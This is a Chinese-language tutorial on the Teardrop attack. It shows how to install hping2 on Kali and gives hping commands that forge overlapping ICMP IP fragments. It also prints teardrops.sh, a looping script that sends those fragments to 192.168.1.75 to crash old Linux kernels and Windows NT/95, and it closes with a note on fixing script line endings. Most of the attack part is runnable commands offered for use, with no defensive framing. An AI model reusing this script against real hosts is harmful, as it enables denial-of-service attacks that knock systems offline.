TearDrops(泪滴攻击)教程

TearDrops（泪滴攻击）

脚本下载地址：——>点击下载<——提取码: 7nfi

用ssh把hping2.0.0-rc3.tar.gz上传到kali的 /usr/local目录下

进入/usr/local目录并查看其下面的文件

利用tar –zxvf hping2.0.0-rc3.tar.gz命令解压缩。

进入 /usr/loca/hping2-rc3/ 目录

利用./configure命令进行配置，最下端有提示你用make命令进行编译

在redhat下可能会没有gcc，会出现 cc:command not foud错误 ，此时需要安装gcc

没有错误可以进行编译，输入make命令进行编译；会看到两项提示的配置。

按照提示以此运行，make strip 和make install 安装

利用命令 hping2 –h 查看hping2的命令帮助，关于hping2的安装与查看部分就完成了

构造两个重叠便宜的IP分片

• ./hping 192.168.1.1 -1 –x –d 1000 –N 100 –c 1

• ./hping 192.168.1.1 -1 –d 200 –g 400 –N 100 –c 1

• //构造了两个ICMP请求ip包分片，第一个载荷量1000，标识100，第二个载荷量200标识100，但本应偏移量为1008，可他却设置了400，这样在分片重组时就会重叠，老的Linux内核（1.x - 2.0.x）在处理这种重叠分片的时候存在问题，WinNT/95在接收到10至50个teardrop分片时也会崩溃。。如果将向上述命令写入脚本，并用循环语句，持续发送，就成了发送泪滴攻击的攻击程序了。

在桌面上已经有写好的泪滴攻击程序，用 cat teardrops.sh命令查看程序内容，如果需要修改目标主机IP，

用命令vi teardrops.sh进行编辑

teardrops.sh脚本：

  #!/bin/bash
  for((i=100;i<150;i++))
  do
  hping 192.168.1.75 -1 -x -d 1000 -N $i -c 1
  hping 192.168.1.75 -1 -d 200 -g 400 -N $i -c 1
  done

利用命令.teardrops.sh执行脚本，若出现没有权限的字符，利用命令chmod 755 teardrops.sh提高权限，若出现v/bin/sh^M：bad interpreter：NO such file ordirectory，请查看下面的注释一。
重新执行teardrops.sh脚本就实现了泪滴攻击

注释一
在Linux中执行.sh脚本，异常/bin/sh^M: bad interpreter: No such file or directory。

分析：这是不同系统编码格式引起的：在windows系统中编辑的.sh文件可能有不可见字符，所以在Linux系统下执行会报以上异常信息。

解决：

1）在windows下转换：

  利用一些编辑器如UltraEdit或EditPlus等工具先将脚本编码转换，再放到Linux中执行。转换方式如下（UltraEdit）：File–>Conversions–>DOS->UNIX即可。

2）也可在Linux中转换：

  首先要确保文件有可执行权限
  sh>chmod a+x filename
  然后修改文件格式
  sh>vi filename
  利用如下命令查看文件格式
  :set ff 或 :set fileformat
  可以看到如下信息
  fileformat=dos 或 fileformat=unix

  利用如下命令修改文件格式
  :set ff=unix 或 :set fileformat=unix
  :wq (存盘退出)
  最后再执行文件
  sh>./filename